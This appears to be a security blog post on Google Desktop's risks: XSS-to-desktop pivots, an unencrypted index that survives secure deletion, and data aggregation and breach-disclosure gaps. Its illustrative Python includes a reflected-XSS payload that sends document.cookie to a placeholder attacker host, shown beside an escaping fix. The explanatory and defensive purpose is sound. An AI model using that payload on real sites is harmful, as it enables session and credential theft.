Without scrutiny, highly usable software that neglects security can seem heroic and revolutionary. Such may be the case for Google Desktop. Most users see the web-meets-desktop search capabilities and don't consider the security implications of making the boundary between google.com and the desktop so seductively porous.
Particularly troubling is the potential for an attacker to access information, documents, and possibly executables through Google Desktop via flaws (XSS in particular) in Google's website. In February, Yair Amit et al. found a vulnerability that could allow remote attackers access to data and functionality through Google Desktop. RSnake has also pointed out some existing Google XSS vulnerabilities on his blog at ha.ckers.org.
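To see why a website flaw can matter so much, consider a generic reflected XSS. The sketch below is purely illustrative (the handler, payload, and attacker URL are hypothetical, not taken from the actual vulnerabilities above): a page that echoes a search query into HTML without escaping will execute attacker-supplied script in the victim's browser, which is all an attacker needs to pivot into whatever that origin can reach.

```python
import html

def render_results_page(query: str, escape: bool = True) -> str:
    """Build a hypothetical search-results page.
    If user input is interpolated unescaped, reflected XSS results."""
    shown = html.escape(query) if escape else query
    return f"<h1>Results for: {shown}</h1>"

# A classic cookie-stealing payload (attacker.example is a placeholder).
payload = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'

vulnerable = render_results_page(payload, escape=False)  # script tag survives intact
safe = render_results_page(payload)                      # script tag is neutralized
```

The fix is nothing exotic, just consistent output encoding; the danger with a web-meets-desktop product is that the blast radius of a missed escape extends past the browser session.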
Also, consider that Google Desktop keeps a fairly sizable index and cache for rapid search, which is unencrypted by default. This index contains an amazing amount of historical data: it retains previous versions of files, web-based email communications, browsing history, etc. The problem is that this data persists even after reasonable efforts by the average user to delete it from the file system. Secure-deletion tools that overwrite files several times before removing them, popular within corporations and government agencies, for example, have no effect on Google's index and cache of those files. This represents a sizable risk because it means that Google Desktop may completely obviate some corporate and governmental procedures for purging data.
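The mechanics are easy to demonstrate. In this minimal Python sketch (the paths and the "cache" directory are stand-ins, not Google Desktop's actual layout), a file is securely overwritten and deleted, yet a copy an indexer made earlier is untouched, because the wipe only ever operates on the original path:

```python
import os
import shutil
import tempfile

def secure_delete(path: str, passes: int = 3) -> None:
    """Overwrite a file with random bytes several times, then remove it."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(os.urandom(size))
            f.flush()
            os.fsync(f.fileno())
    os.remove(path)

workdir = tempfile.mkdtemp()
doc = os.path.join(workdir, "secret.txt")
with open(doc, "w") as f:
    f.write("quarterly financials")

# A desktop-search indexer keeps its own copy in a separate cache directory.
cache = os.path.join(workdir, "cache")
os.makedirs(cache)
shutil.copy(doc, os.path.join(cache, "secret.txt.cached"))

secure_delete(doc)
# The original is gone, but the cached copy still holds the plaintext.
```

Any purge procedure that walks only the user's documents will miss the indexer's copy entirely, which is precisely the gap described above.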
The privacy issues listed above assume that everything works as intended. A greater concern may be the aggregation point of sensitive data created on Google's servers. Consumers have seen so many breaches at data warehouses over the last few years (CardSystems, TJX, etc.) that one wonders how soon financially motivated attackers will turn their sights on Google. One can only imagine that the combined Google/DoubleClick data pool would contain enough "big brother" data to have made George Orwell salivate. Perhaps most interesting is that much of the data housed by Google (such as search history) isn't covered by many disclosure laws (such as California Senate Bill 1386). This means that, depending on the breach, Google may be under no obligation to inform the public. Privacy International, a UK consumer protection group, came down particularly hard on Google in its privacy assessment, ranking the company 23rd out of the 23 companies studied. It went so far as to say, "While a number of companies share some of these negative elements, none comes close to achieving status as an endemic threat to privacy."

All of this means that Google has a big security burden to bear, one that becomes increasingly cumbersome as its success grows. Google has a track record of building cool products that people love to use, but it also has an ethical responsibility to match its ambition in features with security. If ethics don't win out, change may come at a higher price through regulation and shaken consumer confidence. Here are a few open questions that need answers:

How is information provided to Google pushed out to partners, advertisers, and the public?

What security mechanisms are in place to protect aggregated data on Google's servers from vulnerabilities? (This goes beyond masking the identity of the person whose behavior is tracked and speaks to the behavior data itself.)

What is Google's policy for disclosing a breach of search or behavior data that isn't covered by current (and narrow) breach disclosure legislation?
Original post here.